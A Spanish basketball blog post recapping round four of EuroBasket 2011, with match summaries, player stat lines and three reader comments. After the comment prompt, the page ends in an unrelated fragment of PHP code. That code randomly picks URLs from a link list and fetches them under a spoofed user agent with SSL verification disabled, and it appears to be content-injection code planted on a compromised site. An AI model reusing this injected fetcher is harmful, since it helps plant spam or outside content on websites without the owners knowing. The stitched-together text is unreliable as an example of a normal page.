EuroNBAsket 2011: 4ª Jornada

05 de September de 2011 por TheDeerHunter

GRUPO A

Lituania 79 – España 91: Y al cuarto día despertó la bestia. Nadie en este campeonato puede parar esta “roja” al nivel de la primera parte. El comienzo quirúrgico de Calderón abrió el camino de una de las más impresionantes actuaciones de toda la historia de la selección. Acierto demoledor de todas las figuras contra el que únicamente Valanciunas, sin nada que perder, pudo oponer una mínima resistencia. Tras la reanudación no se hizo sangre, aunque sí pudimos disfrutar de las primeras sonrisas de Ibaka en Lituania… y todo esto debería de ser un aviso a navegantes.

Destacados NBA: Jose Calderón 12 ptos, 4 reb, 4 asis, 2 rob; Serge Ibaka 15 ptos, 9 reb, 2 tap (17 min)
Jonas Valanciunas 13 ptos, 2 reb, 3 asis, 1 tap (16 min)

Polonia 84 – Turquía 83: El batacazo de los turcos le pone en bandeja a España el primer puesto del grupo y le complica tremendamente la permanencia. Polonia disfrutó de un día dulce en el tiro exterior para anular la defensa otomana y equiparar su mayor poderío físico. Así se logró llegar a los últimos instantes con igualdad y la fortuna señaló a Berisha como ejecutor. Hoy puede ser un gran día para su país.

Destacado NBA: Enes Kanter 19 ptos, 5 reb, 3 asis, 1 tap
Destacado resto: Dardan Berisha 21 ptos, 2 reb, 3 asis, 1 rob

Gran Bretaña 85 – Portugal 73: Los británicos se estrenaron cumpliendo este trámite sin trascendencia. Al menos se pudo disfrutar de un entretenido duelo entre Deng y Andrade.

Destacado NBA: Luol Deng 31 ptos, 10 reb, 4 asis, 1 rob, 1 tap
Destacado resto: Carlos Andrade 24 ptos, 10 reb, 2 asis, 1 rob, 1 tap.

GRUPO B

Israel 91 – Letonia 88: Vistoso duelo para evitar la cuchara de madera del grupo. Israel confirmó sus buenas sensaciones. Fatal ambos en los tiros libres, que podrían haber determinado el resultado final.

Destacados: Lior Eliyahu 26 ptos, 10 reb, 3 asis, 1 rob
Janis Blums 27 ptos, 4 reb, 6 asis, 1 rob

Italia 84 – Francia 91: A pesar del gran partido de su tríada NBA y el flojo partido de Parker los italianos quedan eliminados. Por un momento parecía que podían mantener sus opciones hasta la última jornada, pero la inmensa diferencia en el rebote y la clarividencia de Diaw en los últimos minutos terminó con sus esperanzas.

Destacados NBA: Boris Diaw 21 ptos, 4 reb, 4 asis; Nicolas Batum 20 ptos, 5 reb, 4 rob, 1 asis y 1 tap
Andrea Bargnani 22 ptos, 5 reb, 1 asis, 1 tap; Marco Bellinelli 19 ptos, 2 reb, 3 asis

Alemania 64 – Serbia 75: Los alemanes aseguraban su clasificación a pesar de la derrota, aunque supongo que las sensaciones no serían las mismas cuando se enteraron de lo que hizo España. Krstic y Savanovic supieron equiparar la producción de Nowitzki&Kaman y con eso está todo dicho. Teodosic rozó el triple doble.

Destacado NBA: Dirk Nowitzki 25 ptos, 6 reb, 1 asis, 1 rob, 1 tap
Destacado resto: Milos Teodosic 12 ptos, 9 reb, 9 asis, 1 rob

GRUPO C

Macedonia 72 – Finlandia 70: A punto estuvieron los nórdicos de volver a liarla a base de triples. Macedonia asegura su clasificación con un partidazo descomunal de Pero Antic, bien secundado por McCalebb y Stojanovski.

Destacado: Pero Antic 14 ptos, 19 reb, 3 asis, 1 rob, 1 tap

Montenegro 55 – Grecia 71: Los helenos también aseguran su plaza con esta victoria excesivamente cómoda. Bonito duelo entre Pekovic y Koufos pero poco más ofreció el choque. Los montenegrinos están muy verdes.

Destacados NBA: Kosta Koufos 19 ptos, 3 reb, 4 tap, 1 asis, 1 rob; Nikola Pekovic 15 ptos, 7 reb

Bosnia-Herzegovina 92 – Croacia 80: Se veía venir que tocaba la de cal para BH y la de arena para Croacia. La pareja Teletovic&Domercant fue superior a Tomic&Bogdanovic. Esta vez no hubo milagro en forma de explosión de Popovic. Recibieron su propia medicina los croatas. Con este panorama es imposible saber quien de los dos pasará a la siguiente ronda. Se admiten apuestas.

Destacados: Mirza Teletovic 26 ptos, 9 reb, 2 asis, 2 rob; Henry Domercant 23 ptos (5/8 3p) 7 reb, 2 rob
Ante Tomic 23 ptos, 3 reb, 1 asis, 1 tap

GRUPO D

Georgia 69 – Ukrania 53: Todo cerrado en el grupo. La falta de dinamita en Ukrania les condena irremediablemente.

Destacado: George Tsintsadze 14 ptos, 3 reb, 3 asis

Bulgaria 77 – Rusia 89: Extraordinaria actuación de Kirilenko y Mozgov, junto con Krhyapa en un partido de trámite. Los búlgaros no dieron mala imagen pero donde no hay…

Destacado NBA: Andrei Kirilenko 25 ptos, 5 reb, 3 asis, 4 rob
Destacado resto: Deyan Ivanov 23 ptos, 5 reb, 2 asis, 1 rob

Bélgica 61 – Eslovenia 70: Otro aburrido trámite. Al menos pudimos disfrutar del mejor partido de Dragic en esta primera fase. Van Den Spiegel confirma que es de lo poquito correcto que tienen los belgas.

Destacado NBA: Goran Dragic 19 ptos, 3 reb, 3 asis, 5 rob
Destacado resto: Thomas Van Den Spiegel 16 ptos, 7 reb, 1 asis, 1 tap, 1 rob

Comenta

3 comentarios a esta entrada

  1. Jose_Dantley dice:
    #1

    La primera parte de ayer fue antológica en todos los aspectos. A ver si esto no los hace adormilarse.

    En clave NBA, que buenísima pinta tiene Valanciunas

      Citar

  2. Sancho88 dice:
    #2

    Pues pasará Macedonia, Grecia y… yo creo que puede pasar Finlandia. Si gana a Montenegro, Grecia le gana a Croacia y Macedonia a Bosnia, los finlandeses están dentro. No es tan descabellado eh?

      Citar

  3. Diestro dice:
    #3

    pues si, al final han entrado los finlandeses jajaja. Esta claro que del grupo de España saldran los 4 primeros o por lo menos los 3 primeros. Solo veo a Rusia capaz de competir con cualquiera de los 4 primeros del grupo de España.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>